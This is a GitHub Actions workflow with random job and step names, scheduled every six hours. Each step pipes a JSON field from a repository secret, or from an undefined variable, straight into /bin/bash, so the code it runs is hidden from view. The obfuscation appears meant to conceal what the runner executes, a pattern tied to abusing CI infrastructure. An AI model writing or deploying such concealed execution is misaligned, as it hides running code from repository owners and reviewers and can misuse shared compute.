name: hechenmo6745
on:
  workflow_dispatch:
  schedule:
    - cron: '50 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hechenmo6745
        env:
          bxoos1: ${{ secrets.bxoos1 }}
        run: |
          echo $bxoos1 | jq -r .zd5 | /bin/bash
          echo $gytgt18591 | jq -r .mxwrj5 | /bin/bash
          echo $njz8877 | jq -r .gu500 | /bin/bash
          echo $wmd51750 | jq -r .oykug915 | /bin/bash
          echo $mk0620 | jq -r .owmz57816 | /bin/bash
          echo $nhd74132 | jq -r .eb29091 | /bin/bash
          echo $lwt0 | jq -r .rhef0 | /bin/bash
          echo $o883 | jq -r .uhr14 | /bin/bash
          echo $wwi92938 | jq -r .w1 | /bin/bash

